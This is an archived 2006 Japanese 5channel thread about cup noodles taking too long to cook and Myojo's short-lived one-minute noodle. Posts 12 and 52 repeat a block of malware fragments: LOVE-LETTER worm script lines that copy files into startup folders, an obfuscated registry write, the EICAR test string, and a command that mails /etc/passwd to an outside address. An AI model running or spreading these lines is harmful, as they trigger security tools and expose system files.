5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

最近のカップめんは完成まで時間がかかりすぎる

1 :Ψ:2006/12/06(水) 02:19:01.88 ID:XpbjPcbC0
5分もかかってたら冷めてしまうだろが

2 :Ψ:2006/12/06(水) 02:20:03.52 ID:eGWwNrSj0
カプヌドルしーふーどまじおぬぬめ

3 :Ψ:2006/12/06(水) 02:21:04.87 ID:IQHFYET50
ブタめん食えよ

4 :Ψ:2006/12/06(水) 02:21:38.86 ID:XpbjPcbC0
それに変に麺に凝りすぎてごわごわにしすぎなんじゃボケ

5 :Ψ:2006/12/06(水) 02:22:09.66 ID:TZXUw3vw0
動画upしました
up2236.zip 特捜最前線 乙種蹄状指紋の謎!
http://www.774.cc:8000/upload-pro/all.html?1165063568

6 :Ψ:2006/12/06(水) 02:22:17.94 ID:n7YOaOP9O
昔1分でできるカプヌードルが発売された。
しかし、急速にのびるので全然売れず発売中止。

7 :Ψ:2006/12/06(水) 02:23:57.77 ID:aLhe8Dev0
硬めのほうがおいしいのに

8 :Ψ:2006/12/06(水) 02:24:03.59 ID:E1iZL9FC0
>>6
石立鉄男がCMしてた記憶がある

9 :Ψ:2006/12/06(水) 02:26:07.94 ID:aQfGt59N0
>>6
クイックワンね。
ちなみに製造中止の理由はそれじゃないねw

10 :Ψ:2006/12/06(水) 02:36:15.11 ID:LxLzkpLo0
>>6
日清じゃない。
明星だ

11 :Ψ:2006/12/06(水) 02:36:54.74 ID:M1Az1PFL0
俺はカップメンそのものもお湯に浸すので冷めることはないな

12 :Ψ:2006/12/06(水) 02:42:39.33 ID:nwbGKuiE0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

13 :Ψ:2006/12/06(水) 02:44:30.73 ID:2AMW2IRD0
>>6
タイガーズじゃ!
http://www.youtube.com/watch?v=W_-DJQ-LHTM
後半にクイックワンのCM(1982)でてくるYO!


14 :Ψ:2006/12/06(水) 02:46:47.50 ID:7yxtgFkNO
あったらいいな!こんなカップ麺
・三分たったらふたの色が変わる
・伸びない
・カロリーオフ
・ゴミが出ない

15 :Ψ:2006/12/06(水) 02:47:10.33 ID:3slpVagZ0
昔の揚げ麺の方のが煮えるの早かった
古い麺の油の酸化が原因で腹痛になったりしたから無くなったんだっけ?

16 :Ψ:2006/12/06(水) 02:48:41.27 ID:oALBXyMz0
あったらいいな!こんなカップ麺
・お湯つき
・待ち時間30秒

17 :9:2006/12/06(水) 02:56:58.81 ID:aQfGt59N0
>>16
クイックワンが無くなった理由は1分だと待ち時間として短すぎるからと聞いたよ?
穿った見方をすれば色んな捉え方があるだろうけど・・・・。




18 :Ψ:2006/12/06(水) 03:02:52.34 ID:nQnuSQE80
長くかかるのも気になるが、お湯を入れるだけの簡単調理が売りだと思ってたのに
最近のはかやくの袋が多かったり、一度入れた湯を捨てて注ぎなおしたり、
レトルトの具を別途温める必要があったりと手順が複雑になってるのが気になる。


19 :Ψ:2006/12/06(水) 03:05:41.73 ID:EaGwW5Xo0
三分のものは二分で
五分のものは三分で食べてます。

ちょっと固めの方が旨いよな

20 :Ψ:2006/12/06(水) 03:10:52.44 ID:dtURqcxd0
お湯入れてすぐかき混ぜて麺がほぐれたら出来上がりだろ?
1分あれば食えるぞ。歯ごたえの無い麺は食えんやろ。


21 :Ψ:2006/12/06(水) 03:11:22.68 ID:LxLzkpLo0
>>18
バカか簡単なのを選べ
パッケージ値段等を加味すれば
だいたい分かるだろ。
味にこだわったようなのを選べば袋は多いわな

22 :Ψ:2006/12/06(水) 03:17:45.11 ID:RRZS9qga0
俺はイケメン

23 :Ψ:2006/12/06(水) 03:18:34.86 ID:B0dX7kNk0
楽にうまいものを作れるように。と言う努力を企業がしなくなったかもな。


24 :REI KAI TSUSHIN:2006/12/06(水) 03:19:30.81 ID:MTGKX8pv0
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
恋いじゃな〜い♪愛じゃな〜い♪
カップ麺が完成するまでの時間全力で腰を振ってね♪
Aha〜、AAha〜… 
入れてから3分 この1発に全てをかける。
中に出しちゃ駄目だって言ったじゃない。
           ∧_∧  キシキシ・・・ Don't think.
        ノハ(     )))
      | ̄C*`∀⌒⌒⌒ヽヾ。
      |\⌒⌒" ノ)、 ノ、 )))
      |  \           \
     \  |⌒⌒⌒⌒⌒⌒⌒|
      \|〜'''''''''''''''''''''''''''''''''''l'''
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

25 :Ψ:2006/12/06(水) 03:22:26.80 ID:0nKc5v+/0
俺の知ってる中じゃ俺の塩が最速だな

26 :Ψ:2006/12/06(水) 03:24:13.68 ID:Nz7auobt0
おまいらのおかげでおなかへった。

でもブタになるから我慢。

27 :Ψ:2006/12/06(水) 03:24:26.64 ID:rlMD55on0
でもさー、カップうどんは
1分多めに待つ位が美味くない?

28 :Ψ:2006/12/06(水) 03:24:31.36 ID:qFwjF7yG0
チキンラーメン

29 :Ψ:2006/12/06(水) 03:26:48.34 ID:nP1K42vI0
なるほどじっと待っているには遅いが、何か用事をするには早すぎると。

30 :Ψ:2006/12/06(水) 03:27:12.53 ID:IaLlkLnS0
カップライスがまた食いたい     


     うそ。もうごめんだ

31 :Ψ:2006/12/06(水) 03:41:46.37 ID:10gMnaFa0
>>17
> クイックワンが無くなった理由は1分だと待ち時間として短すぎるからと聞いたよ?
違うな。正解をお教えしよう。明星の中の人から聞いた本当の話。
待ち時間1分でも、食い始めは熱すぎてなかなか大変。
で、食い終わるまでの時間を計測したら、結局は待ち時間3分の麺の場合と殆ど変わんなかった、ってこった。
で、実際上、待ち時間1分の意味無しと。

32 :Ψ:2006/12/06(水) 03:43:43.11 ID:1lN9KfWQ0
>>31
はいはい。お前性格悪いな

33 :Ψ:2006/12/06(水) 03:45:13.75 ID:XZAvUwEo0
>>31 へーいいこと聞いた。有り難う!




34 :Ψ:2006/12/06(水) 03:48:38.91 ID:bzz5Armt0
カップヌードル以外でお湯を注ぐだけのカップメンてある?

35 :Ψ:2006/12/06(水) 03:57:30.68 ID:DA4idLrBO
スープヌードル

36 :Ψ:2006/12/06(水) 04:19:23.57 ID:RsT0pp+H0
>>31
私もその見解は何かの特番でみたことがある。

37 :Ψ:2006/12/06(水) 04:21:28.44 ID:NuBgcGrY0
お湯を注いだだけで裸のねぇーちゃんが出てくるカップヌードも時々思い出してみて下さい。

38 :Ψ:2006/12/06(水) 04:59:49.73 ID:tThZSAnP0
クイックワンは一度だけ食った事あるけど、不味かったぞ。
リピーターになりたくない味だったからじゃないか?単純に。

39 :Ψ:2006/12/06(水) 05:27:29.85 ID:GnnVp8er0
固めが好きだな
カップヤキソバとか、余熱で程よく仕上がるよな。

40 :Ψ:2006/12/06(水) 06:36:29.66 ID:d24l74pz0
同じような銘柄のでも、カップより袋の方が美味く感じるのはオレだけ?

41 :Ψ:2006/12/06(水) 07:22:07.08 ID:+pCri2ie0
>>40
ラーメン屋さんと
サッポロ塩とかは袋の方がうまい

ラーメン屋さんの冷凍版はまずかった。

42 :Ψ:2006/12/06(水) 07:38:22.37 ID:6pF5iaz60
>>39
俺も固めが好き。学生の頃にどん兵衛にお湯入れて1分で食ってた。
>>40
>>41
その後、袋の安さに負け、発泡スチロールのどんぶりに入れて、カップと同じ
ように作って食うようになった。

43 :Ψ:2006/12/06(水) 07:44:04.04 ID:k7u5QaOG0
>>6-10
エースワンとクイックワンがあった。
どっちかがどっちかを提訴してたよ。

44 :Ψ:2006/12/06(水) 07:54:13.20 ID:zCBr2opgO
どん兵衛が好きだから5分なのは気にならんが、具や液体スープを後から入れるやつはどうも馴染めん
段取りが多いと萎える
手っ取り早いのがインスタントの利点だろ

45 :Ψ:2006/12/06(水) 10:22:41.47 ID:NZNubOFF0
スローフードのこと?

46 :Ψ:2006/12/06(水) 10:32:53.89 ID:T6EwQvDk0
かきこみてすと

47 :Ψ:2006/12/06(水) 12:31:58.27 ID:zFyhC/NQ0
アルキメンデス?

48 :Ψ:2006/12/06(水) 12:46:41.57 ID:2HlVo1ME0
軽自動車がどんどん豪華になっていくのと似てるな。

49 :Ψ:2006/12/06(水) 12:58:58.00 ID:jk8W12sw0
>>42
それ、煮えるのか?
もしほんとに食えるんならやってみたい。
袋はあとで鍋洗うのがめんどくさいんだよな〜。


50 :Ψ:2006/12/06(水) 15:28:16.38 ID:umGxu+T60
つうか熱湯なら、カップヌードルも1分でOKだよな

51 :Ψ:2006/12/06(水) 15:37:15.39 ID:kJ2tTPsv0
コンビニに150円ぐらいのカップ麺が少なくなったことの方が
金のないおれにはつらい

52 :Ψ:2006/12/06(水) 16:05:29.17 ID:ptsu9F/x0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

53 :Ψ:2006/12/06(水) 16:40:03.17 ID:rbO9tDYA0
おーい、それを打ったら
AAがでるのか?

54 :Ψ:2006/12/06(水) 16:51:01.65 ID:n2OlF24DO
調味油やら後入れのスープやらを入れてる内にのびちゃう

55 :Ψ:2006/12/06(水) 16:52:45.95 ID:mEL1cU450
鍋で温め直せばいいじゃんw


56 :Ψ:2006/12/06(水) 17:07:38.33 ID:7lFtHKyT0
>>43
日進が明星のクイックワンを提訴してなかったっけ
カップヌードルの上げ底構造をぱくったとかで

57 :Ψ:2006/12/06(水) 18:29:22.21 ID:k7RutZaB0
>>55
それはまた面倒だ

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)